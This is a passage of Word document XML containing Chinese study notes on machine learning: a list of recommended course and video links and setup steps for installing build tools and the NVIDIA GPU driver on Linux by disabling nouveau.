    <w:p w14:paraId="3ABAB63B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27EDB640" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鸢尾花数据：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://en.wikipedia.org/wiki/Iris_flower_data_set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于该数据常为初学者学习的数据，默认集成在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65756D4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DE7C0E" w14:textId="73C0752B" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>泓吕推荐的学习</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE9EBF" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="47DCD350" w14:textId="4FABBFCE" w:rsidR="00D939BE" w:rsidRDefault="00BB01B1" w:rsidP="00D939BE">
      <w:r w:rsidRPr="00BB01B1">
        <w:t>https://www.bilibili.com/video/BV164411b7dx/?p=1&amp;vd_source=67ec39ab527dded23e1aa2629ec09ce7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA37A4D" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="0397DECD" w14:textId="7072F764" w:rsidR="00D939BE" w:rsidRPr="00D939BE" w:rsidRDefault="00BB01B1" w:rsidP="00D939BE">
      <w:r w:rsidRPr="00BB01B1">
        <w:t>https://zh.d2l.ai/chapter_preface/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B17A4" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD6DF1E" w14:textId="05CBC30C" w:rsidR="00D939BE" w:rsidRDefault="00BB01B1" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB01B1">
        <w:t>https://speech.ee.ntu.edu.tw/~hylee/ml/2022-spring.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A7B81" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA0FC92" w14:textId="091FE9CD" w:rsidR="00D939BE" w:rsidRDefault="00BB01B1" w:rsidP="00D939BE">
      <w:r w:rsidRPr="00BB01B1">
        <w:t>https://www.youtube.com/@AI-qb8eh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A065EDC" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="0171CE1B" w14:textId="56B47F14" w:rsidR="00D939BE" w:rsidRDefault="00313867" w:rsidP="00D939BE">
      <w:r w:rsidRPr="00313867">
        <w:t>https://www.youtube.com/@HungyiLeeNTU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC8D6C" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRPr="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="44CA10C6" w14:textId="51AD603F" w:rsidR="00D939BE" w:rsidRDefault="00313867" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00313867">
        <w:t>https://www.youtube.com/@wkaing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F2452C" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675456EA" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2997361C" w14:textId="17C2AEBC" w:rsidR="00D939BE" w:rsidRDefault="00C95347" w:rsidP="00C95347">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>李沐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416CA346" w14:textId="77777777" w:rsidR="00C95347" w:rsidRDefault="00C95347" w:rsidP="00C95347">
      <w:r w:rsidRPr="00313867">
        <w:t>https://www.youtube.com/@HungyiLeeNTU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2903A79D" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="0C420AE7" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRPr="00C95347" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="5CA903BA" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRPr="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="5B00DF2B" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7E6457" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ADC30C7" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C480D98" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="733E6F1C" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="3D397EC8" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="61C19100" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRPr="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="59E49EBD" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AAAE86" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F619CE" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7448C67B" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="26F343F0" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="5D820D5A" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="61471441" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRPr="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE"/>
    <w:p w14:paraId="7EE0E44A" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A2F38E" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A664E0D" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="00D939BE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D98EC4" w14:textId="77777777" w:rsidR="00D939BE" w:rsidRDefault="00D939BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3F2EC7" w14:textId="55BBC5B3" w:rsidR="00AB5393" w:rsidRDefault="00AB5393" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>旧笔记</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BF1BA9" w14:textId="77777777" w:rsidR="00AB5393" w:rsidRDefault="00AB5393" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A907A9" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6497D049" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="578" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>环境准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E5DF5" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B0746E3" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="等线 Light" w:eastAsia="等线 Light" w:hAnsi="等线 Light" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线 Light" w:eastAsia="等线 Light" w:hAnsi="等线 Light" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>安装显卡和N卡驱动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213745DD" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607FE921" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>先安装gcc</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> g++</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>，b</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uild-essential</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>包含了gcc和g</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>和make的包，推荐使用中科大源。这里我使用清华源速度巨慢。修改源后命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F7985" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>apt install build-essential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2085B7B0" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E4A2A5" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>N卡驱动下载链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12406744" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://www.nvidia.com/content/DriverDownloads/confirmation.php?url=/XFree86/Linux-x86_64/525.89.02/NVIDIA-Linux-x86_64-525.89.02.run&amp;lang=us&amp;type=TITAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC64E94" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C16A6C" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>下载到本地后运行，会提示当前内核中有nouv</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eau</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>的开源组织的驱动。需要禁用此驱动，才能重新运行.</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>的N卡驱动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C5EDE" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vim</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/modprobe.d/blacklist-nouveau.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在文中添加：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7035E1" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>blacklist nouveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECFBA4D" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>options nouveau modeset=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622AF356" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C62281" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602676CB" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>update-initramfs -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA831F9" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">reboot </w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>重启</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5591EA55" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D7A6A7" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>开机后</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lspci | grep -I nouveau</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>发现没有输出，则说明成功禁用nouveau驱动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41214476" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344C3D02" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
